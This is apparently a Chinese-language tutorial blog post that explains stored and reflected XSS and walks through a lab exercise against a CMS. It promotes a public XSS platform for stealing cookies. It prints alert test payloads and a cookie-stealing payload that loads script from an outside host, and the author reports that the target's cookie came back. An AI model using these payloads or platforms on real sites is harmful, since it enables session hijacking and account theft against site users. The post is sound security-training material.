存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种攻击方式需要一点骗术,所以这种攻击范围不是特别的广,并且提交漏洞时要么平台不认,要么会被认定为低危漏洞。
存储型XSS可以采用广撒网的方式,就是攻击者将存储型XSS代码写进一些有XSS漏洞的网站上,只要有用户访问这个链接就会自动中招。所以我们可以看出,存储型XSS的危害性更大,范围更广,可以不需要寻找被攻击对象,只要存储型XSS在服务器上就能实施攻击。所以提交的存储型XSS评级一般为中危漏洞。
这种攻击多见于论坛、博客和留言板。攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。随着帖子被服务器存储下来,恶意脚本也永久地被存放在服务器的后端数据库中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本会在他们的浏览器中得到触发。
例如,攻击者在留言板中加入以下代码:
<script>alert(1)</script>)
这样当其他用户访问留言板时,就会看到一个弹窗。可以看到,存储型XSS的攻击方式能够将恶意代码永久地存入数据库或者文件中,相当于将代码嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射型XSS攻击将没有多大作为,而存储型XSS则不同,由于它注入在一些我们非常信任的页面中,因此无论我们多么小心,都难免会受到攻击。
用前台打后台有可能会把页面插崩,所以在没有明确书面授权的情况下,最好是谨慎去做。正常情况下XSS不会把页面搞崩,比如像这样主动把标签闭合掉<script></script>一般就不会把网页插崩,但是只插入<script>就有可能会崩。
而且在打XSS时,如果前台没有过滤的信息,基本上后台也不会过滤了。
由于XSS的payload构建起来比较复杂,所以一般情况下我们都是使用XSS平台自动生成payload去获取cookie,建议用隐私模式去访问,天知道平台有没有恶意代码。如果想自己搭建平台的话,需要确保发送方能找到你(也就是首先要有一个公网ip)。
在XSS平台中,前辈们已经把要用到的js代码都集成在平台上了。XSS平台可以很好的拿cookie,但是平台管理者想拿走你的cookie也是轻而易举的。有些XSS平台很贴心,有邮件和短信提醒你cookie要过期了。
那么如何获取XSS平台呢?可以百度直接搜素XSS平台,也可以直接在这个平台:http://101.43.103.25/xsser/,建议用隐私模式去注册账号。以这个平台为例:
首先进入XSS平台,然后注册一个账号并登陆。
看到主界面有很多的模块,最常用的是基础默认模块和超强模块。
超强模块中,keepseesion参数是指保持会话,每隔一段时间会自动向目标网站发包,相当于告诉网站,我还在线,请保持cookie的时效性。
注意:图片探测功能虽然不能偷cookie,但是可以偷对方的真实ip。
有些网站会限制文本框的输入长度,因此XSS的payload最好的越短越好。
如果没有长度限制,先打传统的payload,有长度限制再打这种短的。如果别的都打不了,就尝试打图片探测。运气好说不定能获得目标网站的后台登陆页面呢。
对于输入信息执行后,该信息若消失不见,很有可能是被当成代码解析了,XSS生效。在注册用户的用户名那里往往很容易存在XSS,甚至上传文件的文件名,也能拿来打XSS。
作为网站管理者,按F12进入检查页面,在来源那里如果看到一个未知的域名,则往往存在攻击者传来的XSS。
说了那么多,当然要实战一下了!首先进入靶场:
在靶场底部看到了该cms的版本号,因此去百度搜索该cms的通杀漏洞:
看到一个存储型XSS漏洞,通过查看该文章了解该漏洞的利用过程,然后去靶场复现。为了避免谷歌浏览器的安全机制导致漏洞复现失败,因此改用火狐浏览器去操作。在浏览器中输入:
http://59.63.166.75:8082/index.php?c=m&m=a <script>alert(1)</script>
成功弹窗。
实际上这里的c和m的值怎么填都可以,但是传参名得是c和m,具体是为什么,我也不清楚,这肯定是跟源码的代码审计有关了。我们只要知道怎么用就行了。
复制XSS平台生成的攻击代码,插入到网址后面,如下:
http://59.63.166.75:8082/index.php?c=m&m=a </textarea>'"><script src=http://101.43.103.25/xsser/r1AsOY></script>
看到收到了目标网站的cookie信息。